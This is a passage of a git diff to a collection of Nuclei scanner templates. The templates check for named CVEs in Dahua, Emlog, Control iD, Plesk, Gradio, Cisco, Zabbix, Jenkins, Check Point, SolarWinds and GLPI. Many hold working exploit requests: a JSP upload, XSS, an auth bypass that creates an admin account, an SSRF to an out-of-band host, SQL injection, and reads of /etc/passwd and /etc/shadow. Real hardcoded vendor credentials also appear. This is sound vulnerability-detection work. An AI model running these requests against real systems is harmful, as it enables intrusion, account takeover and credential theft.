including/emap/devicePoint_addImgIco?. - remediation: | - Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. - reference: - - https://github.com/qiuhuihk/cve/blob/main/upload.md - - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 - - https://vuldb.com/?ctiid.235162 - - https://vuldb.com/?id.235162 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2023-3836 - cwe-id: CWE-434 - epss-score: 0.03083 - epss-percentile: 0.8997 - cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 2 - vendor: dahuasecurity - product: smart_parking_management - shodan-query: html:"/WPMS/asset" - zoomeye-query: /WPMS/asset - tags: cve,cve2023,dahua,fileupload,intrusive,rce -variables: - random_str: "{{rand_base(6)}}" - match_str: "{{md5(random_str)}}" - -http: - - raw: - - | - POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 - Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT - Host: {{Hostname}} - - --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT - Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" - Content-Type: application/octet-stream - Content-Transfer-Encoding: binary - - {{match_str}} - --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - - | - GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: dsl - dsl: - - "status_code_1 == 200 && status_code_2 == 200" - - "contains(body_2, '{{match_str}}')" - condition: and - - extractors: - - type: regex - name: shell_filename - internal: true - part: body_1 - regex: - - 'ico_res_(\w+)_on\.jsp' -# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-41621.yaml b/nuclei-templates/CVE-2023/CVE-2023-41621.yaml new file mode 100644 index 0000000000..e72d2279cd --- /dev/null +++ b/nuclei-templates/CVE-2023/CVE-2023-41621.yaml @@ -0,0 +1,55 @@ +id: CVE-2023-41621 + +info: + name: Emlog Pro v2.1.14 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Cross Site Scripting (XSS) vulnerability in Emlog Pro v2.1.14 via /admin/store.php. + impact: | + Successful exploitation could lead to unauthorized access or data theft. + remediation: | + Update Emlog Pro to the latest version to mitigate the XSS vulnerability (CVE-2023-41621). + reference: + - https://github.com/GhostBalladw/wuhaozhe-s-CVE/blob/main/CVE-2023-41621 + - https://nvd.nist.gov/vuln/detail/CVE-2023-41621 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-41621 + cwe-id: CWE-79 + epss-score: 0.00046 + epss-percentile: 0.15636 + cpe: cpe:2.3:a:emlog:emlog:2.1.14:*:*:*:pro:*:*:* + metadata: + vendor: emlog + product: emlog + max-request: 1 + fofa-query: title="emlog" + tags: cve,cve2023,emlog,xss + +http: + - raw: + - | + GET /admin/store.php?"onmouseover='alert(document.domain)'bad=" HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: response + words: + - "onmouseover='alert(document.domain)'bad=" + - "emlog" + condition: and + case-insensitive: true + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 490a00463044022002fc85dd44cfcfe59e01d0f0d1c4012fbe34b31679eaf7caf8723b7fc34c4a4b022011e044463412c2932561607ffdda64af6693273c24498a4c5ac1d8797bbbc517:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/CVE_2023_49442.yaml b/nuclei-templates/CVE-2023/CVE-2023-49442.yaml similarity index 100% rename from nuclei-templates/Other/CVE_2023_49442.yaml rename to nuclei-templates/CVE-2023/CVE-2023-49442.yaml diff --git a/nuclei-templates/CVE-2023/CVE-2023-6329.yaml b/nuclei-templates/CVE-2023/CVE-2023-6329.yaml new file mode 100644 index 0000000000..6b75097a45 --- /dev/null +++ b/nuclei-templates/CVE-2023/CVE-2023-6329.yaml @@ -0,0 +1,121 @@ +id: CVE-2023-6329 + +info: + name: Control iD iDSecure - Authentication Bypass + author: DhiyaneshDK,princechaddha + severity: critical + description: | + An authentication bypass vulnerability exists in Control iD iDSecure v4.7.32.0. The login routine used by iDS-Core.dll contains a "passwordCustom" option that allows an unauthenticated attacker to compute valid credentials that can be used to bypass authentication and act as an administrative user. + impact: | + Successful exploitation could allow an attacker to bypass authentication controls. + remediation: | + Apply the vendor-supplied patch or update to the latest firmware version to mitigate the vulnerability. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-6329 + cwe-id: CWE-287 + epss-score: 0.02363 + epss-percentile: 0.90025 + cpe: cpe:2.3:a:controlid:idsecure:4.7.32.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: controlid + product: idsecure + fofa-query: body="iDSecure" + tags: cve,cve2023,auth-bypass,idsecure,control-id,intrusive + +variables: + username: "{{rand_base(8)}}" + password: "{{randstr}}" + sha1Hash: "{{sha1(serial)}}" + passwordRandom: "{{rand_text_numeric(10)}}" + +flow: | + http(1); + javascript(); + http(2); + http(3); + +javascript: + - code: | + var passwordRandom = passwordRandom; + var sha1Hash = template.sha1Hash; + var sha256Hash=(sha256combined.substring(0,6)) + var passwordCustom = parseInt(sha256Hash, 16).toString(); + passwordCustom + args: + sha1Hash: "{{sha1Hash}}" + sha256combined: "{{ sha256(sha1Hash+passwordRandom+'cid2016') }}" + passwordRandom: "{{passwordRandom}}" + +http: + - raw: + - | + GET /api/login/unlockGetData HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: body + words: + - 'serial' + condition: and + internal: true + + extractors: + - type: json + part: body + name: serial + internal: true + json: + - '.serial' + + - raw: + - | + POST /api/login/ HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/json + + {"passwordCustom": "{{javascript_response}}", "passwordRandom": "{{passwordRandom}}"} + + matchers: + - type: word + part: body + words: + - 'accessToken' + condition: and + internal: true + + extractors: + - type: json + part: body + name: access-token + internal: true + json: + - '.accessToken' + + - raw: + - | + POST /api/operator/ HTTP/1.1 + Host: {{Hostname}} + Authorization: Bearer {{access-token}} + Content-Type: application/json + + {"idType": "1", "name": "{{username}}", "user": "{{username}}", "newPassword": "{{password}}", "password_confirmation": "{{password}}"} + + matchers: + - type: dsl + dsl: + - 'contains(content_type, "application/json")' + - 'contains_all(body, "code", "newID")' + condition: and + + extractors: + - type: dsl + dsl: + - '"USER: "+ username' + - '"PASS: "+ password' +# digest: 4a0a00473045022100b0d5998c2e6d48d6cd217d937a720b7df084a8830acc04f343d724e6aec026e8022010f6af2f0b2543e226bf0b5ed6f57515d1575f8238b4c96c332bb5fac96c6612:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git "a/nuclei-templates/CVE-2023/CVE-2023\342\200\22324044.yaml" "b/nuclei-templates/CVE-2023/CVE-2023\342\200\22324044.yaml" new file mode 100644 index 0000000000..5661dadb7d --- /dev/null +++ "b/nuclei-templates/CVE-2023/CVE-2023\342\200\22324044.yaml" @@ -0,0 +1,54 @@ +id: CVE-2023-24044 + +info: + name: Plesk Obsidian <=18.0.49 - Open Redirect + author: pikpikcu + severity: medium + description: | + Plesk Obsidian through 18.0.49 contains an open redirect vulnerability via the login page. An attacker can redirect users to malicious websites via a host request header and thereby access user credentials and execute unauthorized operations. NOTE: The vendor's position is "the ability to use arbitrary domain names to access the panel is an intended feature." + impact: | + Successful exploitation of this vulnerability could allow an attacker to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. + remediation: | + Upgrade Plesk Obsidian to a version higher than 18.0.49 to mitigate the vulnerability. + reference: + - https://portswigger.net/web-security/host-header/exploiting + - https://medium.com/@jetnipat.tho/cve-2023-24044-10e48ab940d8 + - https://gist.github.com/TJetnipat/02b3854543b7ec95d54a8de811f2e8ae + - https://nvd.nist.gov/vuln/detail/CVE-2023-24044 + - https://support.plesk.com/hc/en-us/articles/10254625170322-Vulnerability-CVE-2023-24044 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-24044 + cwe-id: CWE-601 + epss-score: 0.00155 + epss-percentile: 0.51774 + cpe: cpe:2.3:a:plesk:obsidian:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: plesk + product: obsidian + shodan-query: title:"Plesk Obsidian" + fofa-query: title="Plesk Obsidian" + tags: cve2023,cve,header,injection,plesk,obsidian + +http: + - method: GET + path: + - "{{BaseURL}}/login.php" + + headers: + Host: "evil.com" + + matchers-condition: and + matchers: + - type: word + part: location + words: + - 'https://evil.com/login_up.php' + + - type: status + status: + - 303 +# digest: 4a0a00473045022069dc022651b4fb9af6a01bd55d548680f03edd9debffa187316d1b018f1209cc022100c92c5328721c039369314c3c7035951e413c56f1862f781e9d73bac65cfa6719:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-2523.yaml b/nuclei-templates/CVE-2023/cve-2023-2523.yaml similarity index 100% rename from nuclei-templates/CVE-2023/CVE-2023-2523.yaml rename to nuclei-templates/CVE-2023/cve-2023-2523.yaml diff --git a/nuclei-templates/Other/CVE_2024_0195.yaml b/nuclei-templates/CVE-2024/CVE-2024-0195.yaml similarity index 100% rename from nuclei-templates/Other/CVE_2024_0195.yaml rename to nuclei-templates/CVE-2024/CVE-2024-0195.yaml diff --git a/nuclei-templates/CVE-2024/CVE-2024-1183.yaml b/nuclei-templates/CVE-2024/CVE-2024-1183.yaml deleted file mode 100644 index c4e19446e2..0000000000 --- a/nuclei-templates/CVE-2024/CVE-2024-1183.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2024-1183 - -info: - name: Gradio - Server Side Request Forgery - author: DhiyaneshDK - severity: medium - description: | - An SSRF (Server-Side Request Forgery) vulnerability exists in the gradio-app/gradio repository, allowing attackers to scan and identify open ports within an internal network. By manipulating the 'file' parameter in a GET request, an attacker can discern the status of internal ports based on the presence of a 'Location' header or a 'File not allowed' error in the response. - reference: - - https://github.com/gradio-app/gradio/commit/2ad3d9e7ec6c8eeea59774265b44f11df7394bb4 - - https://huntr.com/bounties/103434f9-87d2-42ea-9907-194a3c25007c - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N - cvss-score: 6.5 - cve-id: CVE-2024-1183 - cwe-id: CWE-601 - epss-score: 0.00061 - epss-percentile: 0.24702 - metadata: - verified: true - max-request: 1 - shodan-query: html:"__gradio_mode__" - tags: cve,cve2024,ssrf,oast,gradio - -http: - - raw: - - | - GET /file=http://oast.pro HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' - part: header -# digest: 4a0a004730450221008fa9c24b03fedb13e37837ad2730bc20d6d973ad45a2d74dd82193fb651172c5022057ad36fe5c2c8f0f555f7106c808470d5cfc40e96a168c822c4cc96f1183df15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-20439.yaml b/nuclei-templates/CVE-2024/CVE-2024-20439.yaml new file mode 100644 index 0000000000..cf08677523 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-20439.yaml @@ -0,0 +1,47 @@ +id: CVE-2024-20439 + +info: + name: Hardcoded Admin Credentials For Cisco Smart Licensing Utility API + author: iamnoooob,parthmalhotra,pdresearch + severity: critical + description: | + A vulnerability in Cisco Smart Licensing Utility could allow an unauthenticated, remote attacker to log in to an affected system by using a static administrative credential.This vulnerability is due to an undocumented static user credential for an administrative account. An attacker could exploit this vulnerability by using the static credentials to log in to the affected system. A successful exploit could allow the attacker to log in to the affected system with administrative privileges over the API of the Cisco Smart Licensing Utility application. + reference: + - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cslu-7gHMzWmw + - https://github.com/fkie-cad/nvd-json-data-feeds + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-20439 + cwe-id: CWE-912 + metadata: + verified: true + max-request: 1 + tags: cve,cve2024,cisco,smart,licensing,auth-bypass + +http: + - raw: + - | + GET /cslu/v1/scheduler/jobs HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic Y3NsdS13aW5kb3dzLWNsaWVudDpMaWJyYXJ5NEMkTFU= + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"job_name":' + - '"current_status":' + condition: and + + - type: word + part: content_type + words: + - 'application/json' + + - type: status + status: + - 200 + +# digest: 4a0a004730450220657d909e3aae89e45506b0077a8295b9740cb8411e6cd123e139913b69afeb5c022100b0c18b2a4511a1075b4c7f3df169f94936771e0f7330d84e3d84e284dd093331:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-20440.yaml b/nuclei-templates/CVE-2024/CVE-2024-20440.yaml new file mode 100644 index 0000000000..e533a80d8f --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-20440.yaml @@ -0,0 +1,43 @@ +id: CVE-2024-20440 + +info: + name: Cisco Smart Licensing Utility UnAuthenticated Logs Exposure Leaking Plaintext Credentials + author: iamnoooob,parthmalhotra,pdresearch + severity: high + description: | + A vulnerability in Cisco Smart Licensing Utility could allow an unauthenticated, remote attacker to access sensitive information.This vulnerability is due to excessive verbosity in a debug log file. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to obtain log files that contain sensitive data, including credentials that can be used to access the API. + reference: + - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cslu-7gHMzWmw + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-20440 + cwe-id: CWE-532 + metadata: + verified: true + max-request: 1 + tags: cve,cve2024,cisco,smart,licensing,info-leak + +http: + - raw: + - | + GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "csluev.log" + + - type: word + part: content_type + words: + - "text/x-log" + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100c9266c056e11cf7d2658aff709b7d43f07ebefe4d48034408ef4b234fda0043a022075541c4c0b1ada1794ee1d30c0de132691c315cbc4b50ea085cf6d3dd3b720ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-22120.yaml b/nuclei-templates/CVE-2024/CVE-2024-22120.yaml new file mode 100644 index 0000000000..8580624331 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-22120.yaml @@ -0,0 +1,74 @@ +id: CVE-2024-22120 + +info: + name: Zabbix Server - Time-Based Blind SQL injection + author: CodeStuffBreakThings + severity: critical + description: | + The Zabbix server can execute commands for configured scripts. After executing a command, an audit entry is added to the "Audit Log". Due to the "clientip" field not being sanitized, it is possible to inject SQL into "clientip" and exploit a time-based blind SQL injection vulnerability. + remediation: | + Fixed in versions 6.0.28rc1, 6.4.13rc1, 7.0.0beta2 + reference: + - https://support.zabbix.com/browse/ZBX-24505#/ + - https://github.com/W01fh4cker/CVE-2024-22120-RCE + - https://nvd.nist.gov/vuln/detail/CVE-2024-22120 + - https://support.zabbix.com/browse/ZBX-24505 + - https://github.com/AboSteam/POPC + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2024-22120 + cwe-id: CWE-20 + epss-score: 0.00043 + epss-percentile: 0.09568 + metadata: + max-request: 1 + vendor: zabbix + product: zabbix + shodan-query: + - http.title:"zabbix-server" + - cpe:"cpe:2.3:a:zabbix:zabbix" + - http.favicon.hash:"892542951" + fofa-query: + - icon_hash=892542951 + - app="zabbix-监控系统" && body="saml" + - title="zabbix-server" + google-query: intitle:"zabbix-server" + tags: cve,cve2024,authenticated,zabbix,sqli +variables: + HOST: "{{Host}}" + PORT: "{{Port}}" + SID: "{{SID}}" + HOSTID: "{{HOSTID}}" + +code: + - engine: + - py + - python3 + source: | + import os, struct, socket + from datetime import datetime + hostname=os.getenv('HOST') + port=int(os.getenv('PORT')) + sid=os.getenv('SID') + hostid=os.getenv('HOSTID') + zbx_header = "ZBXD\x01".encode() + message_json = "{\"request\": \"command\", \"sid\": \"" + sid + "\", \"scriptid\": \"3\", \"clientip\": \"' + (select sleep(10)) + '\", \"hostid\": \"" + hostid + "\"}" + message_length = struct.pack('= 10 and zbx_header in response: + print("Vulnerable to CVE-2024-22120") + + matchers: + - type: word + words: + - "Vulnerable to CVE-2024-22120" +# digest: 4a0a00473045022100d6eade8e599069ba5f94de261357dce41150496111312f3c27dd0f4bea5371ef0220244fbe4ba8eca7787fde62c8569d98ee2ddb2aeb614527b154ae892f1f002abc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-23897.yaml b/nuclei-templates/CVE-2024/CVE-2024-23897.yaml new file mode 100644 index 0000000000..1ce87d12b2 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-23897.yaml @@ -0,0 +1,56 @@ +id: CVE-2024-23897 + +info: + name: Jenkins < 2.441 - Arbitrary File Read + author: iamnoooob,rootxharsh,pdresearch + severity: high + description: | + Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system. + reference: + - https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314 + - https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/ + - https://github.com/Mr-xn/Penetration_Testing_POC + - https://github.com/forsaken0127/CVE-2024-23897 + - https://github.com/nomi-sec/PoC-in-GitHub + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-23897 + epss-score: 0.41536 + epss-percentile: 0.97188 + cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* + metadata: + verified: true + max-request: 1 + vendor: jenkins + product: jenkins + shodan-query: "product:\"Jenkins\"" + tags: cve,cve2024,lfi,rce,jenkins +variables: + payload: "{{hex_decode('0000000e00000c636f6e6e6563742d6e6f64650000000e00000c402f6574632f706173737764000000070200055554462d3800000007010005656e5f41450000000003')}}" + +javascript: + - code: | + let m = require('nuclei/net'); + let name=(Host.includes(':') ? Host : Host+":80"); + let conn,conn2; + try { conn = m.OpenTLS('tcp', name) } catch { conn= m.Open('tcp', name)} + conn.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: download\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n'); + try { conn2 = m.OpenTLS('tcp', name) } catch { conn2= m.Open('tcp', name)} + conn2.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nContent-type: application/octet-stream\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: upload\r\nConnection: keep-alive\r\nContent-Length: 163\r\n\r\n'+Body) + resp = conn.RecvString(1000) + args: + Body: "{{payload}}" + Host: "{{Hostname}}" + + matchers: + - type: dsl + dsl: + - 'contains(response, "No such agent \"")' + + extractors: + - type: regex + group: 1 + regex: + - '\b([a-z_][a-z0-9_-]{0,31})\:x\:' +# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-24919.yaml b/nuclei-templates/CVE-2024/CVE-2024-24919.yaml new file mode 100644 index 0000000000..d6def5b623 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-24919.yaml @@ -0,0 +1,40 @@ +id: CVE-2024-24919 + +info: + name: Check Point Quantum Gateway - Information Disclosure + author: johnk3r + severity: high + description: | + CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade. + reference: + - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/ + - https://support.checkpoint.com/results/sk/sk182337 + metadata: + max-request: 1 + vendor: checkpoint + product: quantum_security_gateway + cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:* + shodan-query: html:"Check Point SSL Network" + verified: true + tags: cve,cve2024,checkpoint,lfi + +http: + - raw: + - | + POST /clients/MyCRL HTTP/1.1 + Host: {{Hostname}} + + aCSHELL/../../../../../../../etc/shadow + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:" + - "nobody:" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/zenml-CVE-2024-25723.yaml b/nuclei-templates/CVE-2024/CVE-2024-25723.yaml similarity index 100% rename from nuclei-templates/Other/zenml-CVE-2024-25723.yaml rename to nuclei-templates/CVE-2024/CVE-2024-25723.yaml diff --git a/nuclei-templates/CVE-2024/CVE-2024-28987.yaml b/nuclei-templates/CVE-2024/CVE-2024-28987.yaml new file mode 100644 index 0000000000..be6f36f247 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-28987.yaml @@ -0,0 +1,50 @@ +id: CVE-2024-28987 + +info: + name: SolarWinds Web Help Desk - Hardcoded Credential + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + The SolarWinds Web Help Desk (WHD) software is affected by a hardcoded credential vulnerability, allowing remote unauthenticated user to access internal functionality and modify data. + reference: + - https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2 + - https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28987 + - https://nvd.nist.gov/vuln/detail/CVE-2024-28987 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 + cve-id: CVE-2024-28987 + cwe-id: CWE-798 + epss-score: 0.00091 + epss-percentile: 0.39649 + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:1895809524 + tags: cve,cve2024,exposure,solarwinds,help-desk + +variables: + username: "helpdeskIntegrationUser" + password: "dev-C4F8025E7" + +http: + - raw: + - | + GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username+':'+password)}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + part: body + words: + - displayClient + - shortDetail + condition: and + + - type: status + status: + - 200 +# digest: 4a0a0047304502201fd32ed77338e4aa134552c16d825d9de0a4c83ff103e4e66e5257fca051fd37022100c3b15244b49ca0a9559bb511d6be65d29c10cd6b0efbb9f0a29350c7ce43fc82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-29889.yaml b/nuclei-templates/CVE-2024/CVE-2024-29889.yaml new file mode 100644 index 0000000000..4cf2d7eca8 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-29889.yaml @@ -0,0 +1,246 @@ +id: CVE-2024-29889 + +info: + name: GLPI 10.0.10-10.0.14 - SQL Injection + author: iamnoooob,rootxharsh,pdresearch + severity: high + description: | + GLPI is a Free Asset and IT Management Software package. Prior to 10.0.15, an authenticated user can exploit a SQL injection vulnerability in the saved searches feature to alter another user account data take control of it. + impact: | + SQL Injection vulnerability in GLPI versions 10.0.10-10.0.14 allows an attacker to alter another user account data and take control of it. + remediation: | + This vulnerability is fixed in 10.0.15. + reference: + - https://sensepost.com/blog/2024/from-a-glpi-patch-bypass-to-rce/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-29889 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N + cvss-score: 7.1 + cve-id: CVE-2024-29889 + cwe-id: CWE-89 + cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 8 + vendor: glpi-project + product: glpi + shodan-query: http.title:"glpi" + tags: cve,cve2024,glpi,sqli,authenticated + +flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6) && http(7) && http(8) + +http: + - raw: + - | + GET /index.php?noAUTO=1 HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: fieldlogin + part: body + group: 1 + regex: + - id="login_name" name="([a-z0-9]+) + internal: true + + - type: regex + name: csrf + part: body + group: 1 + regex: + - name="_glpi_csrf_token" value="([0-9a-z]+) + internal: true + + - type: regex + name: fieldpassword + part: body + group: 1 + regex: + - id="login_password" name="([0-9a-z]+) + internal: true + + - raw: + - | + POST /front/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + noAUTO=1&redirect=&_glpi_csrf_token={{csrf}}&{{fieldlogin}}={{username}}&{{fieldpassword}}={{password}}&auth=local&submit= + + matchers: + - type: dsl + dsl: + - status_code == 302 + - contains(location,'front/central.php') + condition: and + internal: true + + - raw: + - | + GET /ajax/common.tabs.php?_glpi_tab=User%241&main_class=tab_cadre_fixe&_target=%2Fglpi%2Ffront%2Fpreference.php&_itemtype=Preference&id=0 HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: id + part: body + group: 1 + regex: + - type='hidden' name='id' value='([0-9]+)' + internal: true + + - raw: + - | + GET /front/preference.php HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: csrf2 + part: body + group: 1 + regex: + - type="hidden" name="_glpi_csrf_token" value="(.*?)" + internal: true + + - raw: + - | + POST /front/preference.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryRNyVHuSeiTMi2G7K + + ------WebKitFormBoundaryRNyVHuSeiTMi2G7K + Content-Disposition: form-data; name="savedsearches_pinned" + + {"exploit":"',api_token='{{randstr}}' where id={{id}};-- -"} + ------WebKitFormBoundaryRNyVHuSeiTMi2G7K + Content-Disposition: form-data; name="_glpi_csrf_token" + + {{csrf2}} + ------WebKitFormBoundaryRNyVHuSeiTMi2G7K + Content-Disposition: form-data; name="name" + + glpi + ------WebKitFormBoundaryRNyVHuSeiTMi2G7K + Content-Disposition: form-data; name="id" + + {{id}} + ------WebKitFormBoundaryRNyVHuSeiTMi2G7K + Content-Disposition: form-data; name="realname" + + + ------WebKitFormBoundaryRNyVHuSeiTMi2G7K + Content-Disposition: form-data; name="_uploader_picture[]"; filename="" + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryRNyVHuSeiTMi2G7K + Content-Disposition: form-data; name="_blank_picture" + + 0 + ------WebKitFormBoundaryRNyVHuSeiTMi2G7K + Content-Disposition: form-data; name="firstname" + + + ------WebKitFormBoundaryRNyVHuSeiTMi2G7K + Content-Disposition: form-data; name="language" + + en_US + ------WebKitFormBoundaryRNyVHuSeiTMi2G7K + Content-Disposition: form-data; name="password" + + + ------WebKitFormBoundaryRNyVHuSeiTMi2G7K + Content-Disposition: form-data; name="password2" + + + ------WebKitFormBoundaryRNyVHuSeiTMi2G7K + Content-Disposition: form-data; name="phone" + + + ------WebKitFormBoundaryRNyVHuSeiTMi2G7K + Content-Disposition: form-data; name="_useremails[-1]" + + + ------WebKitFormBoundaryRNyVHuSeiTMi2G7K + Content-Disposition: form-data; name="mobile" + + + ------WebKitFormBoundaryRNyVHuSeiTMi2G7K + Content-Disposition: form-data; name="phone2" + + + ------WebKitFormBoundaryRNyVHuSeiTMi2G7K + Content-Disposition: form-data; name="registration_number" + + + ------WebKitFormBoundaryRNyVHuSeiTMi2G7K + Content-Disposition: form-data; name="locations_id" + + 0 + ------WebKitFormBoundaryRNyVHuSeiTMi2G7K + Content-Disposition: form-data; name="use_mode" + + 0 + ------WebKitFormBoundaryRNyVHuSeiTMi2G7K + Content-Disposition: form-data; name="_reset_api_token" + + 0 + ------WebKitFormBoundaryRNyVHuSeiTMi2G7K + Content-Disposition: form-data; name="update" + + Save + ------WebKitFormBoundaryRNyVHuSeiTMi2G7K-- + + matchers: + - type: dsl + dsl: + - status_code == 302 + condition: and + internal: true + + - raw: + - | + GET /front/preference.php HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: csrf3 + part: body + group: 1 + regex: + - type="hidden" name="_glpi_csrf_token" value="(.*?)" + internal: true + + - raw: + - | + POST /ajax/pin_savedsearches.php HTTP/1.1 + Host: {{Hostname}} + X-Glpi-Csrf-Token: {{csrf3}} + X-Requested-With: XMLHttpRequest + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + itemtype=Monitor + + matchers: + - type: dsl + dsl: + - status_code == 200 + - 